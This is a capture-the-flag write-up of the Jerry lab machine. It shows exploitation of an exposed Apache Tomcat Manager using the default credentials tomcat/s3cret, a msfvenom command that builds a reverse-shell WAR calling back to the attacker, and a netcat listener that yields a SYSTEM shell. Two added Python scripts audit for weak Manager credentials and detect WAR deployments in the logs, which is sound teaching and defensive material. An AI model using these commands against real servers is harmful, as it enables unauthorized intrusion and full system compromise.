Procedure

Context

Jerry introduces fundamental concepts of web application exploitation and weak credential management. The machine features an exposed Apache Tomcat Manager interface, accessible without restrictions. By identifying and using default or leaked administrative credentials, we gain access to the Tomcat web application manager panel. From there, we exploit the deployment functionality to upload a malicious WAR (Web Application Archive) file—effectively deploying a custom web shell to the server. This direct deployment grants us remote code execution and ultimately a reverse shell on the target system.

Initial Enumeration

We start by performing a quick scan of the target machine using Nmap to identify open ports and services. The -sC flag enables default scripts, while the -sV flag attempts to determine the version of the services running on the open ports. The -p- flag scans all ports from 1 to 65535. The scan reveals that port 8080 is open and running an instance of Apache Tomcat with version 7.0.88.

$ nmap -sC -sV -p- 10.10.10.95
PORT     STATE SERVICE VERSION
8080/tcp open  http    Apache Tomcat/Coyote JSP engine 1.1
|_http-title: Apache Tomcat/7.0.88
|_http-server-header: Apache-Coyote/1.1
|_http-favicon: Apache Tomcat

HTTP

As soon as we access the web application, we are greeted with the default Apache Tomcat page. This page provides information about the server and its version. It also includes links to the Manager application, which is a web-based interface for managing the Tomcat server. If we try to access Server Status, Manager App, or Host Manager, we are prompted to enter credentials.

Since we haven't found any credentials yet, we cancel the request, which redirects us to a 401 Unauthorized page. Here, we find the credentials for the Manager application. The credentials are: username tomcat and password s3cret.
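The root cause here is an account in tomcat-users.xml that holds a Manager role while still using the example password from Tomcat's own documentation. The following audit script is an added example (not part of the original writeup); the tomcat-users.xml it parses is constructed inline, and the list of example passwords and the 12-character threshold are assumptions of the example.

```python
# Added example (not part of the original writeup): audit a Tomcat
# tomcat-users.xml for accounts that hold Manager roles and still use the
# example credentials shipped in Tomcat's own documentation (tomcat/s3cret),
# which is exactly what the Jerry box exposes. The XML below is constructed.
import xml.etree.ElementTree as ET

# Roles that grant access to the Manager / Host Manager web applications.
PRIVILEGED_ROLES = {"manager-gui", "manager-script", "manager-jmx",
                    "manager-status", "admin-gui", "admin-script"}
# Example/common passwords (assumed list): the first two appear on Tomcat's 401 page.
EXAMPLE_PASSWORDS = {"tomcat", "s3cret", "admin", "password", ""}

SAMPLE_TOMCAT_USERS = """<?xml version="1.0" encoding="UTF-8"?>
<tomcat-users xmlns="http://tomcat.apache.org/xml" version="1.0">
  <role rolename="manager-gui"/>
  <role rolename="manager-script"/>
  <user username="tomcat" password="s3cret" roles="manager-gui"/>
  <user username="deployer" password="Zx9!kq2#Lp7$wT" roles="manager-script"/>
  <user username="viewer" password="tomcat" roles="viewer"/>
</tomcat-users>
"""

def _local(tag):
    """Strip the XML namespace so the same code works with or without xmlns."""
    return tag.rsplit("}", 1)[-1]

def find_weak_manager_accounts(xml_text):
    """Return (username, reason) for every account that can reach the Manager
    app and uses an example password or a password shorter than 12 chars."""
    findings = []
    for elem in ET.fromstring(xml_text).iter():
        if _local(elem.tag) != "user":
            continue
        roles = {r.strip() for r in elem.get("roles", "").split(",") if r.strip()}
        privileged = roles & PRIVILEGED_ROLES
        if not privileged:
            continue  # accounts without a Manager role cannot deploy WARs
        password = elem.get("password", "")
        username = elem.get("username", "?")
        if password.lower() in EXAMPLE_PASSWORDS:
            findings.append((username, "documentation example password"))
        elif len(password) < 12:
            findings.append((username, "password shorter than 12 characters"))
    return findings

if __name__ == "__main__":
    for user, reason in find_weak_manager_accounts(SAMPLE_TOMCAT_USERS):
        print(f"[!] {user}: {reason}")
```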

Exploitation

Now that we have the credentials, we can log in to the Manager application, which lets us deploy, start, and stop web applications on the server. Its WAR file upload section accepts an arbitrary WAR file, so we can package a reverse shell as a WAR and deploy it. In my case, I used msfvenom to create the WAR file as follows:

$ msfvenom -p java/jsp_shell_reverse_tcp LHOST={our_local_machine_ip} LPORT=PORT -f war > shell.war

When we upload the WAR file, we can see that it is deployed in the webapps directory.

The deployed application is reachable at http://10.10.10.95/shell. Before opening it, we need to start a netcat listener on the same port we set as LPORT in the msfvenom command:

$ nc -lvnp PORT 

Remember that -l listens for an incoming connection, -v is verbose, -n skips DNS resolution, and -p sets the port.

We can now access the WAR file and we should receive a reverse shell on our netcat listener. After getting it, we can see that we are running as user nt authority\system.

$ nc -lvnp 1234
listening on [any] 1234 ...
connect to [10.10.16.8] from (UNKNOWN) [10.10.10.95] 49195
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.

C:\apache-tomcat-7.0.88> whoami
whoami
nt authority\system
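From the defender's side, every step of this deployment leaves a trace in Tomcat's access log: the authenticated Manager session and the upload request itself. The detector below is an added example (not part of the original writeup); it assumes the default AccessLogValve pattern `%h %l %u %t "%r" %s %b`, and the log lines it parses are constructed to mirror the steps above.

```python
# Added example (not part of the original writeup): flag WAR deployments made
# through the Tomcat Manager in a Tomcat access log. Assumes the default
# AccessLogValve pattern '%h %l %u %t "%r" %s %b'; the log lines are constructed.
import re
from urllib.parse import urlsplit, parse_qs

LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ (?P<user>\S+) \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+$')

SAMPLE_LOG = """\
10.10.16.8 - - [19/Jun/2018:10:01:02 +0000] "GET /manager/html HTTP/1.1" 401 2473
10.10.16.8 - tomcat [19/Jun/2018:10:01:09 +0000] "GET /manager/html HTTP/1.1" 200 19203
10.10.16.8 - tomcat [19/Jun/2018:10:02:31 +0000] "POST /manager/html/upload?org.apache.catalina.filters.CSRF_NONCE=ABC HTTP/1.1" 302 -
10.10.16.8 - - [19/Jun/2018:10:02:40 +0000] "GET /shell/ HTTP/1.1" 200 -
10.10.16.8 - deployer [19/Jun/2018:10:05:00 +0000] "PUT /manager/text/deploy?path=/inventory&update=true HTTP/1.1" 200 61
192.0.2.7 - - [19/Jun/2018:10:06:00 +0000] "GET /docs/ HTTP/1.1" 200 5331
"""

def detect_manager_deploys(log_text):
    """Return one alert per Manager deploy request, naming the authenticated
    account, the client address and (for the text API) the context path."""
    alerts = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        parts = urlsplit(m["target"])
        is_html_upload = m["method"] == "POST" and parts.path == "/manager/html/upload"
        is_text_deploy = m["method"] == "PUT" and parts.path == "/manager/text/deploy"
        if not (is_html_upload or is_text_deploy):
            continue
        # The HTML form carries the WAR in the request body, so the context path
        # is only visible for the text interface, where it is a query parameter.
        path = parse_qs(parts.query).get("path", ["<from WAR filename>"])[0]
        alerts.append({
            "time": m["time"], "client": m["host"], "user": m["user"],
            "interface": "html" if is_html_upload else "text",
            "context": path, "status": int(m["status"]),
        })
    return alerts

if __name__ == "__main__":
    for alert in detect_manager_deploys(SAMPLE_LOG):
        print(f"[!] {alert['time']} {alert['client']} user={alert['user']} "
              f"deployed via {alert['interface']} -> {alert['context']}")
```

Any alert whose client address is not a known deployment host, or whose account is one of the stock Tomcat names, is worth an immediate look.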

While investigating the file system, we find in the directory C:\Users\Administrator\Desktop\flags a file named "2 for the price of 1.txt". This file contains the user flag and the root flag.

Glossary
  • Apache Tomcat: An open-source Java Servlet container developed by the Apache Software Foundation. It allows for the deployment and management of Java-based web applications. In this machine, it's used as the main attack surface due to its exposed Manager interface.
  • WAR (Web Application Archive): A file format used to package Java web applications. A WAR file can include JSPs, servlets, and other resources. In this context, a malicious WAR containing a reverse shell is deployed to the server.
  • msfvenom: A tool from the Metasploit framework used to generate payloads in various formats. Here, it's used to create a malicious WAR file with a reverse shell payload targeting the Tomcat server.
  • Reverse Shell: A type of shell where the target machine initiates a connection back to the attacker's system. This allows the attacker to remotely control the machine, bypassing NAT/firewall restrictions.
  • Nmap: A network scanning tool used to discover open ports and running services on a target machine. Flags like -sC, -sV, and -p- enable script scanning, service/version detection, and full port range scanning, respectively.
  • Netcat (nc): A versatile networking tool used for creating TCP/UDP connections. Here, it is used to listen for incoming reverse shell connections using the -lvnp flags (listen, verbose, no DNS resolution, specify port).
  • nt authority\system: The highest privilege level in Windows, equivalent to root in Unix-based systems. Gaining access as this user indicates full control over the target machine.